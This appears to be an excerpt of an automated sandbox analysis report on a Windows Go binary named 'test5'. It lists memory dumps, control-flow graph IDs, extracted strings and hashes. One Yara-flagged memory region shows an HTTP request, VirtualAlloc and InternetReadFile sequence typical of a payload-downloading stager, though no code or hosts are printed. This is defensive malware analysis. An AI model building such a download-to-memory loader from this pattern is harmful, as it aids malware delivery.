                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal App$NtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 $VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal $runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625cannot exec a shared library directlyv$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownreflect: internal error: invalid method indexcontext: internal error: missing ca$runtime: NtCreateWaitCompletionPacket failed; errno=casfrom_Gscanstatus: gp->status is not in scan statenon-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS thr$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                      • API String ID: 0-595098893
                      • Opcode ID: 2e983b30753b70251fc1161e55a0d08891b7a8997f9e960b1f4103545c767d95
                      • Instruction ID: d01d8ddc33587b9d32de6480879b696699d6ddf86a6e3f71886ab5ba702e7c92
                      • Opcode Fuzzy Hash: 2e983b30753b70251fc1161e55a0d08891b7a8997f9e960b1f4103545c767d95
                      • Instruction Fuzzy Hash: C2C1BE72208B8585DB50EB25F48539E77A6F74AB80F40822AEEDC43BA6DF39C185C754

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 618 6b0d80-6b0d84 619 6b0d8a-6b0dc0 call 6b2f40 618->619 620 6b1017-6b1020 call 6eeac0 618->620 623 6b0dc5-6b0de3 619->623 620->618 625 6b0de9-6b0e04 call 6b0c20 623->625 626 6b1005-6b1016 call 6e9320 623->626 631 6b0e19-6b0e69 call 6b2f40 625->631 632 6b0e06-6b0e15 call 6f0a00 625->632 626->620 637 6b0e6f-6b0e8f call 6b0c20 631->637 638 6b0ff0-6b1000 call 6e9320 631->638 632->631 642 6b0e91-6b0ea0 call 6f0a00 637->642 643 6b0ea4-6b0eae 637->643 638->626 642->643 644 6b0f49-6b0f6c call 6b0c20 643->644 645 6b0eb4-6b0ed4 call 6b0c20 643->645 652 6b0f6e-6b0f7d call 6f0a00 644->652 653 6b0f81-6b0fac call 6b0c20 644->653 654 6b0ee9-6b0ef3 645->654 655 6b0ed6-6b0ee5 call 6f0a00 645->655 652->653 666 6b0fae-6b0fbd call 6f0a00 653->666 667 6b0fc1-6b0fcd 653->667 659 6b0ef9-6b0f19 call 6b0c20 654->659 660 6b0fdf-6b0feb call 6e9320 654->660 655->654 670 6b0f1b-6b0f2f call 6f0a00 659->670 671 6b0f33-6b0f43 659->671 660->638 666->667 670->671 671->644 672 6b0fce-6b0fda call 6e9320 671->672 672->660
                      Strings
                      • bcryptprimitives.dll, xrefs: 006B0D99
                      • NtCreateWaitCompletionPacket, xrefs: 006B0E74
                      • RtlGetVersion, xrefs: 006B0F8D
                      • NtCreateWaitCompletionPacket exists but NtCancelWaitCompletionPacket does notMapIter.Next called on an iterator that does not have an associated map Valuecannot convert slice with length %y to array or pointer to array with length %xNtCreateWaitCompletionPacke, xrefs: 006B0FCE
                      • RtlGetCurrentPeb, xrefs: 006B0F4E
                      • bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible , xrefs: 006B1005
                      • ProcessPrng, xrefs: 006B0DE9
                      • NtAssociateWaitCompletionPacket, xrefs: 006B0EB9
                      • NtCancelWaitCompletionPacket, xrefs: 006B0EFE
                      • ntdll.dll, xrefs: 006B0E27
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: NtAssociateWaitCompletionPacket$NtCancelWaitCompletionPacket$NtCreateWaitCompletionPacket$NtCreateWaitCompletionPacket exists but NtCancelWaitCompletionPacket does notMapIter.Next called on an iterator that does not have an associated map Valuecannot convert slice with length %y to array or pointer to array with length %xNtCreateWaitCompletionPacke$ProcessPrng$RtlGetCurrentPeb$RtlGetVersion$bcryptprimitives.dll$bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible $ntdll.dll
                      • API String ID: 0-833950751
                      • Opcode ID: 890156123fe27e68fba9030029304e2ddc4b02370866048d1bbcdba6f6433784
                      • Instruction ID: f6b783caaf7cf88d93d282e337f6def0f9a47c087ef3b26b5a3eb7db22403188
                      • Opcode Fuzzy Hash: 890156123fe27e68fba9030029304e2ddc4b02370866048d1bbcdba6f6433784
                      • Instruction Fuzzy Hash: 8A614571206F48C5FB51DF15E8443AA7BAAF749780F48813AEA9C437A6EF79C498C700
                      Strings
                      • VC, xrefs: 006E4FC5
                      • malloc deadlockruntime error: with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = requested skip=bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo, xrefs: 006E4FA8
                      • mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= , xrefs: 006E4F86
                      • malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=, xrefs: 006E4F97
                      • mallocgc called with gcphase == _GCmarkterminationruntime.Pinner: object was allocated into an arenaruntime.Pinner: decreased non-existing pin counterrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCal, xrefs: 006E4FB9
                      • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006E49B3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$malloc deadlockruntime error: with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = requested skip=bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo$malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=$mallocgc called with gcphase == _GCmarkterminationruntime.Pinner: object was allocated into an arenaruntime.Pinner: decreased non-existing pin counterrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCal$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= $VC
                      • API String ID: 0-3353434475
                      • Opcode ID: b3c0e9def0f2b1eb2acee7d1a630f618e95cd709c5d7e0a2e4b208da0e45476c
                      • Instruction ID: 3559b827da8e2e18cf9ba6ea4d5c991fa9f7c5d057830ff1c17f345074c9aeae
                      • Opcode Fuzzy Hash: b3c0e9def0f2b1eb2acee7d1a630f618e95cd709c5d7e0a2e4b208da0e45476c
                      • Instruction Fuzzy Hash: EF42F47270A7D486DB64CF26E4407AAB766F786B94F489116EF9D03B95CF38C885CB00

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 992 682060-682064 993 68206a-682079 call 68d640 992->993 994 6828e2-6828e7 call 6eeac0 992->994 998 68207e-682160 993->998 994->992 999 682162-682171 call 6f0a00 998->999 1000 682175-6821a3 call 682940 998->1000 999->1000 1005 6821a9-6821c5 1000->1005 1006 682363-682366 1000->1006 1009 68220c-682233 1005->1009 1010 6821c7-6821e9 call 6ea4e0 1005->1010 1007 68252a-68252d 1006->1007 1008 68236c-682388 1006->1008 1011 68265c-682682 call 682900 1007->1011 1012 682533-68254f 1007->1012 1013 68238a-6823ac call 6ea4e0 1008->1013 1014 6823cf-6823f6 1008->1014 1016 68229c-68235b 1009->1016 1017 682235-682298 call 6f0ac0 call 6f0a00 1009->1017 1029 6821eb-6821fa call 6f0a00 1010->1029 1030 6821fe-682208 1010->1030 1035 682688-682748 call 682900 * 2 1011->1035 1036 6828dc-6828e1 1011->1036 1018 68258f-6825b5 1012->1018 1019 682551-682573 call 6ea4e0 1012->1019 1038 6823ae-6823bd call 6f0a00 1013->1038 1039 6823c1-6823cb 1013->1039 1022 6823f8-68245f call 6f0ac0 call 6f0a00 1014->1022 1023 682463-682522 1014->1023 1016->1006 1017->1016 1031 6825f5-682657 1018->1031 1032 6825b7-6825f1 call 6f0a80 1018->1032 1045 682588 1019->1045 1046 682575-682584 call 6f0a00 1019->1046 1022->1023 1023->1007 1029->1030 1030->1009 1031->1011 1032->1031 1059 68274a-68274e 1035->1059 1060 682750-682772 call 682920 1035->1060 1038->1039 1039->1014 1045->1018 1046->1045 1061 6827a1-6827b7 1059->1061 1067 68277d-68277f 1060->1067 1068 682774-68277b 1060->1068 1063 6827bd-682859 call 682900 1061->1063 1064 6828d6-6828db 1061->1064 1071 68285b-68286a 1063->1071 1072 682871-682899 call 682900 1063->1072 1070 682780-682782 1067->1070 1068->1070 1073 682799 1070->1073 1074 682784-682788 1070->1074 1071->1072 1080 68289b-6828a0 1072->1080 1081 6828a1-6828d5 call 682900 1072->1081 1075 68279b-68279d 1073->1075 1074->1073 1077 68278a-68278e 1074->1077 1075->1061 1077->1073 1079 682790-682797 1077->1079 1079->1075
                      Strings
                      • sse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensendtosocketactiveclosedsocks5acceptcookieexpectserversysmontimersefenceselect, not object next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = , xrefs: 006822ED
                      • pclmulqdqrwxrwxrwxtlsrsakex%s %q: %sempty urlInheritedmath/randClassINETAuthorityquestionsunderflowuser32.dlldnsapi.dlldwmapi.dllws2_32.dllIsValidSidDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionLocalAllocLockFileExOpenEventWOpenMutexWOpenThreadPulseEventR, xrefs: 006820DF
                      • adxaesshaavxfma///%25204206304400500\\.\\?\??net): TTLMD4MD5truebindHost&lt;&gt;idlehttp1080POSTdateetagfromhostlinkvaryfilereadopensyncpipeStatallgallprootitabsbrkdead is LEAFbase of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= s, xrefs: 00682086
                      • rdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsysca, xrefs: 00682100
                      • avx512bwavx512vltlskyberif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1ClassANYQuestionMD5+SHA1SHA3-224SHA3-256SHA3-384SHA3-512SHA1-RSADSA-SHA1avx512cdavx512eravx512pfavx512dqntdll.dllole32.dllpsapi.dllwinmm.dllFindCloseLocalFreeMoveFileWPurgeCommSetu, xrefs: 0068261C
                      • avx512fnil keytls3descharset\\.\UNCos/execruntimeanswersSHA-224SHA-256SHA-384SHA-512Ed25519MD5-RSAamxtileamxint8amxbf16osxsaveGoStringEqualSidCancelIoReadFileSetEventAcceptExIsWindowWSAIoctlrecvfromshutdownhijackedif-matchlocationFullPathscavengepollDesctraceB, xrefs: 006825F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: adxaesshaavxfma///%25204206304400500\\.\\?\??net): TTLMD4MD5truebindHost&lt;&gt;idlehttp1080POSTdateetagfromhostlinkvaryfilereadopensyncpipeStatallgallprootitabsbrkdead is LEAFbase of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= s$avx512bwavx512vltlskyberif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1ClassANYQuestionMD5+SHA1SHA3-224SHA3-256SHA3-384SHA3-512SHA1-RSADSA-SHA1avx512cdavx512eravx512pfavx512dqntdll.dllole32.dllpsapi.dllwinmm.dllFindCloseLocalFreeMoveFileWPurgeCommSetu$avx512fnil keytls3descharset\\.\UNCos/execruntimeanswersSHA-224SHA-256SHA-384SHA-512Ed25519MD5-RSAamxtileamxint8amxbf16osxsaveGoStringEqualSidCancelIoReadFileSetEventAcceptExIsWindowWSAIoctlrecvfromshutdownhijackedif-matchlocationFullPathscavengepollDesctraceB$pclmulqdqrwxrwxrwxtlsrsakex%s %q: %sempty urlInheritedmath/randClassINETAuthorityquestionsunderflowuser32.dlldnsapi.dlldwmapi.dllws2_32.dllIsValidSidDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionLocalAllocLockFileExOpenEventWOpenMutexWOpenThreadPulseEventR$rdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsysca$sse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensendtosocketactiveclosedsocks5acceptcookieexpectserversysmontimersefenceselect, not object next= jobs= goid sweep B -> % util alloc free span= prev= list=, i =
                      • API String ID: 0-3585467764
                      • Opcode ID: 619c65b7fd3277ca11d91cb4e3f4f65f7788ec59bcb3fa79e7dd1fc932e4e730
                      • Instruction ID: e7ba68ba92d4c7ae10457d877b6537852ab0bbfd175d78fc92ac5d9444adddb2
                      • Opcode Fuzzy Hash: 619c65b7fd3277ca11d91cb4e3f4f65f7788ec59bcb3fa79e7dd1fc932e4e730
                      • Instruction Fuzzy Hash: C132BB7AA14F48C1E700DF26F84579937B5F35AB80F54922AEA8D87362DF39C0A9C345

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1353 21551b0015a-21551b00180 HttpOpenRequestA 1354 21551b00181-21551b001bd 1353->1354 1357 21551b00360-21551b00381 VirtualAlloc 1354->1357 1358 21551b001c3-21551b001c6 1354->1358 1362 21551b00383-21551b003a0 InternetReadFile 1357->1362 1359 21551b00358-21551b00359 1358->1359 1360 21551b001cc 1358->1360 1359->1357 1360->1354 1362->1359 1363 21551b003a2-21551b003aa 1362->1363 1363->1362 1364 21551b003ac-21551b003b6 1363->1364
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                      • String ID: U.;
                      • API String ID: 1187293180-4213443877
                      • Opcode ID: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
                      • Instruction ID: 090699bb14df1985eb9f7c3fece1c99fe1adcfaf9aa6d12df807c3009a26288f
                      • Opcode Fuzzy Hash: 384db265c013720a470dfad14405f5eea7b7aafc50a111f5be8b2763f8998fcb
                      • Instruction Fuzzy Hash: EF11BB6034890D2BF61981AD7C9A73A21CBD3D8765F24816FB10EC32D6EC68CC82411A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: NameUser_snprintfmallocstrrchr
                      • String ID:
                      • API String ID: 1238167203-0
                      • Opcode ID: ecc06dbed6b00357dbdd203c36bf59700dfcb02d7072b491f5a07a84e667c2e0
                      • Instruction ID: 6f8b05eb17c594c1c1ce755649324c4e089d7e910d76511946f520d0c2dab815
                      • Opcode Fuzzy Hash: ecc06dbed6b00357dbdd203c36bf59700dfcb02d7072b491f5a07a84e667c2e0
                      • Instruction Fuzzy Hash: 84518530718E589FEA48BB78A4867EE76D3E7D8310F5445ADA08AC3296DA34DC428742
                      Strings
                      • 9Zj, xrefs: 006A63CB
                      • grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryruntime.Pinner: argument is not a pointer: runtime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru, xrefs: 006A6394
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: 9Zj$grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryruntime.Pinner: argument is not a pointer: runtime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru
                      • API String ID: 0-2512891660
                      • Opcode ID: 64ef0073116d78c69874766450261784afc98ebe48f121a692329a8ea973c4d4
                      • Instruction ID: 5d04ab02dabb0b9add25172e723858b42b58d09a2d8944b98f785c7c82c15ea4
                      • Opcode Fuzzy Hash: 64ef0073116d78c69874766450261784afc98ebe48f121a692329a8ea973c4d4
                      • Instruction Fuzzy Hash: 29E17072209B8485DB60EB25E48039EBB62F786BD0F589116EF9D43B69DF38C855CF40
                      Strings
                      • PowerRegisterSuspendResumeNotification, xrefs: 006B10A9
                      • powrprof.dll, xrefs: 006B1059
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: PowerRegisterSuspendResumeNotification$powrprof.dll
                      • API String ID: 0-3247360486
                      • Opcode ID: 080df910b754c45983ad319ec92a29659eb1a73e91a9d118513df2ae33f38e27
                      • Instruction ID: bd2ba9507e4a0d9b8f06c6c3cefe5cda3f9c4bd6a2977731de8df4e7f112f761
                      • Opcode Fuzzy Hash: 080df910b754c45983ad319ec92a29659eb1a73e91a9d118513df2ae33f38e27
                      • Instruction Fuzzy Hash: 63217C32204B84C2DB00DF11F44539ABBA6F38AB80F98811AEB9C47B69DF7DC095CB00
                      Strings
                      • span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incor, xrefs: 00693044
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
